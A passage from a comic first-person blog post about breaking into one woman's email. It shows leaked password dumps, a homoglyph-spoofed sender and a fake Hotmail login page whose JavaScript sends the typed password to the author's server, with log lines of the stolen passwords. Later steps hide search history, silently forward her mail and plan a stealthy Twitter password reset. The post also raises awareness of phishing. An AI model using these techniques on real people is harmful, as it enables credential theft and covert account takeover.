<p>Here we can see a couple of websites Diana has accounts on have been hacked. The only one which had passwords stolen for Diana was Tumblr. So the next goal is to <em>acquire</em> the Tumblr database leak from 2013.</p>
<h3 id="lets-get-the-old-tumblr-database">Let’s get the old Tumblr database</h3>
<p>I try to use my ~hacker connections~ to get a copy of the Tumblr database. I meet a someone whose forum handle is like d4rkrayne or whatever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say “how much?” (my voice comes out several octaves lower and all grizzly like a 40-year-old generic white dude movie star with like, juuust the right amount of stubble). He sells me the database on a pile of 442 floppy disks for 5,000 credits. What a ripoff. I teleport behind him, say “nothin’ personal, kid”, and hoverboard-kickflip into the night.</p>
<p>…I download the Tumblr database from a publicly accessible, unauthenticated, absolutely non-dark web website. I scramble to get back in my black hoodie, and whip on a second pair of sunglasses over the first. I’m <em>in</em>.</p>
<h2 id="ancient-forbidden-password-rituals">Ancient forbidden password rituals</h2>
<p>The Tumblr database dump - a hacking Quest Item - is one long file with lines that look like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>coolrelateabledude123@gmail.com:3a1920ceb2791d034973c899907847cb58810808
</code></pre></div></div>
<p>That weird thing after the email is a password hash. A password hash is like a scrambled up version of the password. You can’t unscramble it. If you know the password though, you can scramble it and get the same omlette, <em>if ya know what I’m sayin’</em>🍳.</p>
<p>My goal here is to figure out what Diana’s <em>actual</em> password is, given that I have her password hash. This process is commonly known as “hacking”.</p>
<p>These particular passwords are not just hashed, but also salted<sup id="fnref:salted" role="doc-noteref"><a href="#fn:salted" class="footnote" rel="footnote">8</a></sup>. This means that before each password is hashed, the good folks at Tumblr added an extra bit of text to the end of each one. So instead of hashing, say, <code class="language-plaintext highlighter-rouge">cooldad64</code>, they’d hash <code class="language-plaintext highlighter-rouge">cooldad64HNc62V8</code>.</p>
<h2 id="finding-the-salt">Finding the salt</h2>
<p>There’s no official information on what kind of hashes are in <code class="language-plaintext highlighter-rouge">Tumblr.txt</code>.</p>
<p>The fully sick attack I want to do is: hashing a big list of passwords I <em>just happen to have lying around wow</em> and checking if any of the hashes match Diana’s password hash. This is called a “dictionary attack”, because the person who invented it was actually a dictionary. The trouble is, you need to know the salt to do this.</p>
<p>I google around some more, bask in the glory of <em>very</em> poorly constructed sentences on some <em>~hacker forums~</em>, and ask my <em>~hacker connections~</em> in an attempt to find out what the salt is.</p>
<p>But I can’t find it because fun fact I’m a total fraud.</p>
<h2 id="can-i-get-the-password-without-the-salt">Can I get the password… without the salt?</h2>
<p>So remember how Tumblr salted the passwords by sticking some random stuff on the end to thwart wannabees like me?</p>
<p>The trouble is…. They stick the same thing (in my example, <code class="language-plaintext highlighter-rouge">HNc62V8</code>) on the end of <em>every</em> password. This isn’t considered the best practice here in the year of our lord 2017, because it means that users with the same password have the same password hash.
The emails and passwords would look like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>markjohnson64@email.com:cooldad64HNc62V8
chicago.tony1@email.com:cooldad64HNc62V8
patriotsfan69@email.com:p@triots69HNc62V8
iamsherlocked.ravenclaw@email.com:Bongo1HNc62V8
</code></pre></div></div>
<p>I search <code class="language-plaintext highlighter-rouge">Tumblr.txt</code> for not <code class="language-plaintext highlighter-rouge">dianalastname@hotmail.com</code>, but for her password hash. (<code class="language-plaintext highlighter-rouge">3a1920ceb2791d034973c899907847cb58810808</code>)</p>
<p>I find more than <strong>20 Tumblr users with the same password</strong> as Diana aw yeah</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[REDACTED]@email.com:3a1920ceb2791d0...
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
</code></pre></div></div>
<p>This makes me think that Diana’s password is probably not very unique, since all these other Dr. Who enthusiasts on Tumblr have also thought of it.</p>
<p>But <em>also</em>. Now I’ve got 20 other email addresses with the same password as Diana. Thanks to the miracle of everyone using the same password for everything, I’ve got a way to find Diana’s password.</p>
<p>I <em>just so happen AGAIN WOW WHATTA GUY</em> to have the LinkedIn database dump from when LinkedIn was 360 whirlwind slam <a href="https://en.wikipedia.org/wiki/2012_LinkedIn_hack">hacked</a> in 2012<sup id="fnref:nolinkedin" role="doc-noteref"><a href="#fn:nolinkedin" class="footnote" rel="footnote">9</a></sup>.</p>
<p>Why do I care about the dump from the LinkedIn hack, you ask, fatigued from many gags and desperate for the part where we actually hack Diana?</p>
<p>LinkedIn also hashed their passwords in 2012, but they didn’t add that freshly ground pink Himalayan rock salt to them. Also, the password hashing method they used is cripplingly insecure<sup id="fnref:insecure" role="doc-noteref"><a href="#fn:insecure" class="footnote" rel="footnote">10</a></sup> (SHA1 for all you extremely online people out there). Because of these flubs, most (>97%) of the passwords in the LinkedIn dump are available <em>in plain text, not even hashed at all</em> thanks to the hard work and GPU cycle donations of people in the password cracking community.</p>
<p>I get the 20-ish Tumblr emails who have the same Tumblr password as Diana, and look <em>them</em> all up in the LinkedIn dump. They’re not all in there, but good enough baybee.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
[REDACTED]@email.com:qwerty1
[REDACTED]@email.com:killer6
[REDACTED]@email.com:qwerty1
[REDACTED]@email.com:qwerty1
</code></pre></div></div>
<p>More than 80% of them have the same LinkedIn password. (Which we will say is <code class="language-plaintext highlighter-rouge">qwerty1</code>.)</p>
<p>This has <em>gotta</em> be Diana’s password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them have the password <code class="language-plaintext highlighter-rouge">qwerty1</code> on LinkedIn, it’s very likely that Diana’s Tumblr password is <code class="language-plaintext highlighter-rouge">qwerty1</code>.</p>
<p>I try to log in to her Hotmail account with the password <code class="language-plaintext highlighter-rouge">qwerty1</code>.</p>
<p>“Incorrect password”</p>
<h2 id="wait-please-this-was-supposed-to-be-easy-please-no-why-is-it-like-this-dont-do-this-to-me">Wait please this was supposed to be easy please no why is it like this don’t do this to me</h2>
<p>Oh <em>come on</em> I was supposed to be hacking a <em>normal person</em> who uses the same password for everything this isn’t fAiR. There are entire criminal <a href="https://www.owasp.org/index.php/Credential_stuffing">industries</a> built on the idea that people use the same password all over the place because <em>nobody cares enough to remember more than a few passwords</em> because they’ve <em>got things to scroll on their phone</em> okay.</p>
<p>Somehow, Diana is one of the <em>rare few people</em> who is not a security expert but has <em>more than one</em> password for her stuff.</p>
<p>I try this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on <em>none</em> of them<sup id="fnref:passwordguessing" role="doc-noteref"><a href="#fn:passwordguessing" class="footnote" rel="footnote">11</a></sup>.</p>
<p>On Facebook, I’m conveniently informed that this password <em>was</em> her password 5 months ago, but isn’t any more.</p>
<p><img src="https://i.imgur.com/S6nK5tL.png" alt="fbpassword" /></p>
<p>Looks like I just missed out. The plot thickens audibly.</p>
<p>This was supposed to be the part where I say “and then I logged into her email 100% stealthily”, equip my third consecutive pair of sunglasses, and move on to the next bit. But alas, Diana was only in one leaked password list on <code class="language-plaintext highlighter-rouge">haveibeenpwned.com</code> at the time, so there goes that.</p>
<p>Fiiiiiiiiiiine whatever I don’t even care I’m not crying, you’re crying. Time to do this the old fashioned way. And by “the old fashioned way” I of course mean “the way government hackers do it”.</p>
<h1 id="part-3-hackinggggg-again">Part 3: Hackinggggg (again)</h1>
<h2 id="social-engineering">Social engineering</h2>
<p>Alright so we’re just going to trick her into telling me her password.
Is that cheating? Basically. But <em>absolutely</em> I’m going to do it anyway.</p>
<p>To get into her email, I need to <em>know</em> Diana’s email password. Resetting the password won’t work (since that would interrupt her life by locking her out of her email). I don’t really wanna follow her around, man-in-the-middle attack her phone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.</p>
<p>You may have heard of “phishing”, the process of emailing someone and tricking them into doing something, like giving you their password.</p>
<p>Now, hold up bucko, you’re probably thinking of the kind of phish where someone says “good day sir I nigerian prince give you $1 million dollars USD u are royalty 2 me” etc. etc.</p>
<p>Or maybe you’re thinking of someone sending an email that says “[heavy breathing] pls clikc on my urls <a href="http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe">http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe</a>”</p>
<p>But with nothing more than paperclips, chewing gum, a single fidget spinner, and an advanced psychology degree, we can not only steal Diana’s password, but do it without Diana realising she’s been tricked.</p>
<h2 id="hand-crafting-artisanal-phishing-emails-to-sell-at-the-sunday-markets">Hand-crafting artisanal phishing emails to sell at the Sunday markets</h2>
<p>Let’s write down what we want to do:</p>
<ul>
<li>Get Diana’s email password</li>
<li>Don’t let her realise that the email is not legit</li>
</ul>
<p>Hmm I guess there were only two dot points uhh sorry that doesn’t seem worth having dot points at all ummmm</p>
<p>So anYwAy the trick to phishing is that you don’t want to engage the victim’s attention. You want them to interact with your email mindlessly, without thinking it’s a big deal. Kinda like how you click through email notifcations from Twitter (or anything that sends you email notifications) without really thinking about the email, because you’re thinking about what awaits on the other end.</p>
<p>The <em>other</em> way, rather than distracting the victim, is to misdirect them. You give them something that’s <em>way</em> more interesting to pay attention to than your dodgy link. Common examples of this include emails that say “OMG your account has been HACKED, log in here to fix it”.</p>
<p>But of course, you log in to a fake website which steals your password.</p>
<p>Wow actually that sounds pretty<sup id="fnref:pretty" role="doc-noteref"><a href="#fn:pretty" class="footnote" rel="footnote">12</a></sup> easy<sup id="fnref:easy" role="doc-noteref"><a href="#fn:easy" class="footnote" rel="footnote">13</a></sup> doesn’t it? Let’s try that then.</p>
<p>I’ll make an email that says “Your Microsoft Account Has Been Hacked And Uh If You Don’t Log In Now It Will Get Deleted So Uh Yeah You Better Log In”.</p>
<p>Instead of designing my own legit-looking Microsoft email, it’s easier to just copy one that Microsoft has already made. I search <em>my</em> hotmail account<sup id="fnref:myhotmail" role="doc-noteref"><a href="#fn:myhotmail" class="footnote" rel="footnote">14</a></sup> for an automated email from Microsoft.</p>
<p>I use the incredibly cutting edge “Inspect Element” feature of the popular hacking software, Google Chrome, to edit the text of the email but keep the look.
As I right click and hover over “Inspect Element”, my laptop instantly explodes, I get root access to Microsoft, I’m added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I’m accepted to DEFCON.</p>
<p>Now it looks like this:</p>
<p><img src="https://i.imgur.com/kv9nALW.png" alt="microphish" /></p>
<p>I can’t send the email from my email account, because I’m not a <em>total amateur</em>. I use the popular hacking tool The Microsoft Sign Up Screen to make the hotmail account “msftacountteam@outlook.com”. If you look closely, “account” is spelled wrong. I used “msft” because it wouldn’t let me include the word “microsoft”.</p>
<p>I try to register an account with first name “Microsoft” and last name “Account Team”. The signup form doesn’t let me. Blast. Thwarted by Microsoft lackeys. Probably, Microsoft doesn’t let you have “Microsoft” in your account name to prevent, uh, exactly what I’m doing. Hmmm. I don’t really want to have a typo in the name, like “Micorsoft”, since Diana might notice that.</p>
<p>Instead I, a level 8 Wizard, cast a spell to swap the “o” characters in “Microsoft” for a special unicode character (like an emoji but much worse) that looks exactly like an “o”. It’s not, of course, it’s our old friend, the Greek letter <a href="https://en.wikipedia.org/wiki/Omicron">“Omicron”</a>. Here’s the two pals side-by side:</p>
<p>οo</p>
<p>Awww, just look at ‘em having a blast.
These little guys might look different in the font your device is using, but in the hotmail web UI font they look juuuust right👌.</p>
<p>So now, my account’s name isn’t “Microsoft”, It’s “Micr<code class="language-plaintext highlighter-rouge">[omicron]</code>s<code class="language-plaintext highlighter-rouge">[omicron]</code>ft”, according to the code that checks whether you have a valid name when you sign up for an account.</p>
<p>I’m sure you’re wondering how this whole process ends up with me getting Diana’s password, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she’ll be asked to log in<sup id="fnref:loggedin" role="doc-noteref"><a href="#fn:loggedin" class="footnote" rel="footnote">15</a></sup>. The page she goes to will look just like the Hotmail login page, but it will <em>really</em> be a copy that sends the password to me.</p>
<p>How can I make such a page? Well I’ll clone the real page, register a domain that looks similar to <code class="language-plaintext highlighter-rouge">login.live.com</code>, host my cloned page there, and so on.
Juuust kidding, the static website hosting service <a href="https://aerobatic.io">Aerobatic</a> happens to also be an <em>excellent</em> phishing service.</p>
<p>I can register <code class="language-plaintext highlighter-rouge">[anything].aerobatic.io</code>, and deploy my static HTML to that domain with their command line tool for free.</p>
<p>Shout outs to Aerobatic for the smooth smooth phishing UX. Use the referral code DIANA to be immediately reported to the NSA.</p>
<p>I copy the existing <code class="language-plaintext highlighter-rouge">login.live.com</code> page, and pre-fill <code class="language-plaintext highlighter-rouge">dianalastname@hotmail.com</code> in the “email address” field. I deploy this page extremely trivially to <code class="language-plaintext highlighter-rouge">login-live.aerobatic.io</code>, and equip my fourth pair of sunglasses (don’t worry I’ve earned it). This <em>almost</em> looks right, but the real Hotmail login form has a bunch of stuff after the <code class="language-plaintext highlighter-rouge">/</code> in the URL, so I copy/paste some of that good stuff too<sup id="fnref:goodstuff" role="doc-noteref"><a href="#fn:goodstuff" class="footnote" rel="footnote">16</a></sup>.</p>
<p>Here’s the exact URL, if you’re interested. Also if you’re not interested. It’s gonna be there either way.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin
</code></pre></div></div>
<p><img src="https://i.imgur.com/aZJoeYA.png" alt="Screenshot of login page" /></p>
<p>Perfect<sup id="fnref:loginscreen" role="doc-noteref"><a href="#fn:loginscreen" class="footnote" rel="footnote">17</a></sup>. This looks similar enough to fool a cursory glance, and that’s all we need baybee. Maybe she’ll think “why do I have to log in again? I’m already logged in to my email?”, but the email asks for a “Secure Login” (whatever that is).</p>
<p>Here’s what the login page does:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// When the Login button is clicked or Enter is pressed
$('#passwordForm').on('submit', function() {
var password = $('#password').val();
// Create an image with a URL that points to my website.
// The browser will request this URL in an attempt to load the image (which will fail since that URL doesn't exist)
$('body').append('<img src="a-website-i-own.com/DIANA?'%20+%20password%20+%20'" alt="image">');
// Wait one second to simulate loading time (adjust to 0.1s if you don't live in Australia sigh), and then go to the real Hotmail login page.
// Diana will already be logged in, so this will seem to her exactly like she's just logged in to hotmail.
window.setTimeout(function() {
window.location = 'login.live.com'
}, 1000);
return false;
}
</code></pre></div></div>
<p>This works by sending her password to me when she clicks “log in”. The password is sent to a website of mine. Then I send her along to the real Hotmail, so it looks just liked she logged in.
The website logs everything that gets sent to it, so I can then search my logs for “DIANA” to find the log containing the password.</p>
<p>This is all what I’m hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you have to do something <em>right now</em> is a common tactic to make you think instinctively and irrationally.</p>
<p>I login to my fake “Microsoft Account Team” hotmail account, send the email to dianalastname@hotmail.com and wait for her to have herself a red-hot browse.</p>
<p>About 12 hours later, I check my logs to see if she’s typed her password.</p>
<p>She doesn’t.</p>
<p>I wait another 12 hours.</p>
<p>Still nothing.</p>
<p>I send the email again, wincing slightly, this time saying she has 24 hours.</p>
<p>Still nothing.</p>
<h2 id="well-damn">Well damn</h2>
<p>I guess that didn’t work.
She must have just ignored the email as uninteresting<sup id="fnref:attention" role="doc-noteref"><a href="#fn:attention" class="footnote" rel="footnote">18</a></sup></p>
<p>I try to think of non-phishing ways to get her password but really phishing is just <em>too good</em>. The nice thing about being the attacker is that you can put your eggs in many baskets. Diana has to defend against <em>all</em> of my eggs, and I’ve got baskets <em>for days</em>. Time for round 2.</p>
<h2 id="sniper-scope-targeted-phishing-blap-blap">Sniper scope targeted phishing blap blap</h2>
<p>I reach under my desk, unwrap a parcel addressed to “DIRECTOR OF CYBER, NSA”, slide out a yellow and black canister labelled “CHINA”, break open the safety seal, and use safety tongs to extract the following red-hot phish.</p>
<p>This time, instead of using a generic idea that would work on anyone (“suspicious account activity”), we’ll make something special just for Diana. Kinda like hand-knitting a beanie, but comparatively less wholesome.</p>
<p>I Google “google docs microsoft equivalent” and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive look I dunno just look it’s Google Docs but Microsoft so good enough for me.</p>
<p>I make a convincing looking resume (in Google Docs, of course) and copy it into a OneSkyCloudDrive 364/2 Days: Final Remix HD+ Doc.</p>
<h2 id="lets-play-whos-gonna-send-this-doc-to-diana">Let’s play: who’s gonna send this doc to Diana?</h2>
<p>I find a local company that’s likely to legitimately want to talk to Diana, and search for a recruiter who works there on LinkedIn. I make someone with the same first name, but a different last name as a real recruiter from this company<sup id="fnref:lookupthecompany" role="doc-noteref"><a href="#fn:lookupthecompany" class="footnote" rel="footnote">19</a></sup>.</p>
<p>I make a fake gmail account called Kathleen Wheeler, using a stock photo of a middle-aged western woman as the profile photo.</p>
<p>Here’s what Kathleen is going to email Diana.</p>
<p><img src="https://i.imgur.com/McUFzCO.png" alt="email screenshot" /></p>
<p>Looks legit riiiight?</p>
<p>The questions at the end are just some garbage I made up, but the point of them is to distract Diana right after she reads the “click here”.</p>
<p>I put Diana’s real phone number at the end to make it more convincing. This email is obviously meant <em>just</em> for her. It also makes sense for the phone number to be there, since presumably whoever listed Diana as a referee gave the phone number to Kathleen.</p>
<p>At the time she types her password, we want Diana to be thinking of what’s on the other side of the login screen.</p>
<p>The delicious bait here is that this email says “someone said they know you”, and you have to read the resume to find out who. Aw, but the resume is behind a pesky link. ~<em>Guess you better just click on it</em>~. LinkedIn also does this in their, um, “engagement” emails which say things like “you have 2 new messages”, but not who they’re from or what they say.</p>
<p>When Diana clicks on the link to the “resume”, it will take her to the same fake login page (with her email pre-filled) as before. When she types anything in the password box, the site will wait one second and then send her to the Microsoft Google Doc™. The one-second wait is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks</p>
<p>She’ll find that she doesn’t know the person, probably because they’re completely made up. They have work experience at real workplaces nearby, and went to the same university as Diana at around the same time, so hopefully their resume passes a cursory glance<sup id="fnref:glance" role="doc-noteref"><a href="#fn:glance" class="footnote" rel="footnote">20</a></sup>.</p>
<p>Finding an unfamiliar resume is a sufficient, but not particularly satisfying conclusion to the adventure of the weird email from Kathleen. But of course, by then it’s too late, I’m sitting in my ivory tower <em>surrounded</em> by passwords.</p>
<p>I make sure to send it during business hours, from “Kathleen”””, pull a necklace from under my shirt dramatically, kiss it, look up at the sky, and wait.</p>
<h2 id="waiting">Waiting</h2>
<p>That night, I check my website’s logs for any passwords from my fake Hotmail login form.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>- - [[date]:16:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.1" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
</code></pre></div></div>
<p>“Got it!”</p>
<p>….. is what I think, at first.</p>
<p>Particularly keen readers will have noticed that the password Diana has typed into my fake Hotmail login page is… the same password as we found for her in the Tumblr database.</p>
<p>This is <em>not</em> her Hotmail password, and everything is terrible.</p>
<p>From this we can draw two conclusions:</p>
<ul>
<li>Diana <strong>doesn’t know</strong> what her Hotmail password is</li>
<li>She now <em>thinks</em> her hotmail password is <code class="language-plaintext highlighter-rouge">qwerty1</code>, since she typed it into my fake login page which accepts <em>any password</em>, and it worked</li>
</ul>
<p>I almost gave up at this point, but a last-minute burst of desperation/frustration/final destination helped me work up the courage to have another shot here in Act 3.</p>
<p>By this point my fake Microsoft Account Team email account has been soft-banned by the good people at William Gates Inc. for sending so many obvious phishing emails. I have to prove I’m a human and add my phone number to the account, and then it unlocks and I can edit the Microsoft Google Doc.</p>
<p>I <em>hastily</em> make a new fake resume of <em>significantly</em> lower quality than the first one, and make a crucial change to my fake login page.</p>
<p>My fake login page now says “wrong password” <em>no matter what</em> you type in the first two times you try typing something. If you type <code class="language-plaintext highlighter-rouge">qwerty1</code>, then the password counter doesn’t go up<sup id="fnref:suggestion" role="doc-noteref"><a href="#fn:suggestion" class="footnote" rel="footnote">21</a></sup>.</p>
<p>What do people do when they get a “wrong password” error? Try <em>all</em> of the 3 or 4 passwords they use for everything, of course.</p>
<p>I want to try and get Diana to type <code class="language-plaintext highlighter-rouge">qwerty1</code>, get a “wrong password” error, and then just unload all her passwords into my form.</p>
<p>Diana replied to my failed email with “sorry I don’t know this person”, and so Kathleen replies with, “wrong resume lol, here’s the new one” even though this makes zero sense in the context of our email exchange. I’m hoping Diana will just be busily checking the email on her phone and not really notice this discrepancy.</p>
<p><img src="https://i.imgur.com/H6QEW3d.png" alt="Dianareply1" /></p>
<p><img src="https://i.imgur.com/H8TlvtC.png" alt="oopswrongresume" /></p>
<p>I use a different font from the “form” when typing as Kathleen to make it look like this is a form that gets copy/pasted to every candidate. This makes Kathleen seem like she does this all the time in her big bustling, 100% real office. I also do my best to imitate the tone of a polite but stressed out office worker. You can almost <em>hear</em> the office politics. It’s called <em>method acting</em>.</p>
<p>Time to stressfully wait for Diana to check for her email again, so now would be a good time to read out some donations.</p>
<h2 id="hours-later">Hours later</h2>
<p>It works.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
108.162.249.169 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702
"https://docs-login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin"
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
</code></pre></div></div>
<p>I get only one password from Diana (typed multiple times), but it’s different to the last one I got (<code class="language-plaintext highlighter-rouge">qwerty1</code>)<sup id="fnref:gaslighted" role="doc-noteref"><a href="#fn:gaslighted" class="footnote" rel="footnote">22</a></sup>.</p>
<p>I wait until she’s asleep based on her <a href="https://defaultnamehere.tumblr.com/post/139351766005/graphing-when-your-facebook-friends-are-awake">Facebook Messenger last active time</a> and log into her email using the elite hacking method of typing her password into the box.</p>
<p>The reason I waited until she was asleep was in case Hotmail emailed the account saying “New Sign In”. It doesn’t, and I’m rewarded with her email inbox screen in its full glory.</p>
<p><img src="https://i.imgur.com/BIfr6BE.png" alt="emailscreenshot" /></p>
<p>Angels sing softly above me. A small yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they’re really sorry and they’ve done a lot of soul searching and they want to make it up to me and I should expect premium fruit baskets on my doorstep in the coming months. Global warming halts.</p>
<h2 id="but-that-would-never-work-on-me">“But that would never work on me”</h2>
<p>It would tho.</p>
<p>Perhaps some of you in the audience are thinking “Wow, this Diana person must be pretty dumb to fall for that. Good thing I’m a web browsing <em>prodigy</em> with a colossal brain and many opinions, so that would never happen to me.”</p>
<p>The thing is, right now you’re very alert, because you’re reading a blog post about hacking. If you were just reading your email, half-paying-attention on a train as normal, security wouldn’t likely be on your mind. If sending trick emails is good enough for whoever <a href="https://www.washingtonpost.com/world/hospitals-across-england-report-it-failure-amid-suspected-major-cyber-attack/2017/05/12/84e3dc5e-3723-11e7-b373-418f6849a004_story.html">the NSA</a>, are emailing, then it’s probably good enough to work on you and me.</p>
<p>I guess what I’m saying here is “don’t go shaming phishing victims plz”.</p>
<p>Anyway sorry back to <strong>haͅck͐i̥n̏g̜</strong></p>
<h1 id="part-4-hacker-voice-im-in">Part 4: HACKER VOICE I’M IN</h1>
<p>I immediately try Diana’s email password (<code class="language-plaintext highlighter-rouge">wertyu2</code>) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I’ve chosen someone with <em>slightly</em> above average personal security to target.</p>
<p>The obvious next step is to forward all her email to me (so I don’t have to keep logging in to her email). Before I set up email forwarding, I try it out on a hotmail account I control. I’m testing to see if setting up “forward all your email to this address” sets off any notifications I’ll have to delete, or notifies you in any other way.</p>
<p>In gmail, when you forward all your mail to another email address, the other address gets emailed a code, and also a big red bar appears on your gmail inbox saying “you’re sending literally all of your email to this address FYI” for 7 days.</p>
<p>I type in my email address into my test hotmail account, and click “forward all my mail here pls”. It saves. I check both email inboxes for a notification email. There isn’t one. I’ve just backdoored this email account and no fuss has been made whatsoever. OH well at least hotmail has NoMansSkyDrive 2.8 Remastered XL Online or whatever.</p>
<p><img src="https://i.imgur.com/aZJoeYA.png" alt="emailforwarding" /></p>
<h2 id="an-interlude-from-diana">An interlude from Diana</h2>
<p>Diana replies to my email saying she doesn’t know this person either. She’s a little suspicious, so I try and say something that will close the conversation.</p>
<p><img src="https://i.imgur.com/dO95Qmp.png" alt="dianasuspicious" />
<img src="https://i.imgur.com/dq6xzfl.png" alt="kathreply2" /></p>
<p>Diana doesn’t reply.</p>
<h2 id="hey-remember-how-you-can-search-email">Hey remember how you can search email?</h2>
<p>Now that I have Diana’s email password, I want to search her email for more passwords, and use those passwords to get more, and so on, like a REAL hacker.</p>
<p>Try going to your email and searching for “password”. Betcha there’s passwords in there.</p>
<p>In Hotmail, when you go to search something, the last 5 searches you’ve done pop up as suggestions.</p>
<p><img src="https://i.imgur.com/pGuxFuj.png" alt="searchhistory" /></p>
<p>This means that if I search for “password”, Diana will notice “password” in the search history. That would be a really lame way to get caught.</p>
<p>To get around this, I:</p>
<ul>
<li>Wait until Diana is asleep</li>
<li>Write down her last 5 searches</li>
<li>Search for “password”</li>
<li>Look at the results</li>
<li>Search for her last 5 searches again, in reverse order</li>
</ul>
<p>Since <em>only</em> the last 5 searches are shown, by repeating the searches in reverse order, the search history looks exactly the same.</p>
<p>Much to the disappointment of the live studio audience, I don’t find anything particularly useful. I find the two passwords I already know (<code class="language-plaintext highlighter-rouge">qwerty1</code> and <code class="language-plaintext highlighter-rouge">wertyu2</code>) several times, and one other password which I again try on all her accounts, but doesn’t work <code class="language-plaintext highlighter-rouge"></3</code>.</p>
<p>I hang out in Diana’s email for several months. Every so often I check it.
I find her signing a contract for a job, and so I get her passport number, signature, phone number, bank account number, and basically everything I’d need to impersonate her. I don’t really<sup id="fnref:gov1" role="doc-noteref"><a href="#fn:gov1" class="footnote" rel="footnote">23</a></sup><sup id="fnref:gov2" role="doc-noteref"><a href="#fn:gov2" class="footnote" rel="footnote">24</a></sup><sup id="fnref:gov3" role="doc-noteref"><a href="#fn:gov3" class="footnote" rel="footnote">25</a></sup> want to impersonate someone’s government-issued ID, so I leave this alone.</p>
<p>At one stage, I’m browsing through hit political discourse platform and opinion conveyor belt twitter dot com, and I notice Diana tweet something along the lines of “Finally spent my day off consolidating my 4 email accounts into 1, feels good to be organised”.</p>
<p>I panic a little. Have I been found out? I log in to <code class="language-plaintext highlighter-rouge">dianalastname@hotmail.com</code> (which still works, thankfully) and see that all her emails have been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it’s being sent to <code class="language-plaintext highlighter-rouge">dianalastname42@gmail.com</code> (presumably the new email that Diana now forwards all her mail to).</p>
<p>This raises an important question. How did Diana not notice my email address in the “forward all mail to:” box? Did she see it, and just mindlessly delete it?</p>
<p>(When I interview her after all this, she says yes, that’s exactly what she did.)</p>
<h2 id="what-now">What now?</h2>
<p>Normally it would end here. Mission accomplished. I’m in control of her email. I could cause catastrophic damage to Diana’s life if I wanted to (I don’t btw). There’s potential for endless gags, limitless goofs, unlimited japes, infinte jests, etc.</p>
<p>But.. it seems like an awful shame to just… leave. That’s why I start work on a little’ somethin’ called</p>
<h2 id="operation-luigi">Operation Luigi</h2>
<p><em>Everybody just LOVES Mario’s green friend Luigi! He’s a Certified Good Boy! Just look at that boyish charm.</em></p>
<p><img src="https://sickr.files.wordpress.com/2013/06/luigi-circle.jpg" alt="a good boy" /></p>
<p><em>Why not brighten up YOUR social media presence with this game boy?</em></p>
<p>Well gee I’m sold after that delightful interlude from our sponsor, The Nintendo. Let’s get Diana some uncut, Colombian Luigi.</p>
<h3 id="step-1-get-in-to-her-twitter-and-linkedin">Step 1: Get in to her Twitter and LinkedIn</h3>
<p>So, I want to:</p>
<ul>
<li>Get access to Diana’s Twitter</li>
<li><em>Not</em> lock Diana out</li>
<li><em>Not</em> alert Diana that I’m up in her stuff</li>
</ul>
<p>I could just phish her again for these passwords, but I’m already a salty old fisherman by this point.</p>
<p>Since I have access to her email, I could reset her Twitter password.
The problem is, when you reset your Twitter password, you get logged out of Twitter in Chrome, the Twitter app, and anywhere else you might be logged in. So you have to retype your new password. One of my rules was that I wouldn’t interrupt Diana’s life, so I need her to be able to log back in to Twitter when I force her to log out.</p>
<p>I come up with a simple 8-step plan to do this, with 4 easy repayments of 2 steps.</p>
<ol>
<li>Wait until Diana is asleep</li>
<li>Disable Diana’s email forwarding</li>
<li>Go to Twitter and reset her password</li>
<li>Click the password reset link that gets emailed to her</li>
<li><strong>Set her password to <code class="language-plaintext highlighter-rouge">qwerty1</code></strong></li>
<li>Delete the password reset email</li>
<li>Delete the “New Twitter Sign In” email</li>
<li>Re-enable email forwarding</li>
</ol>
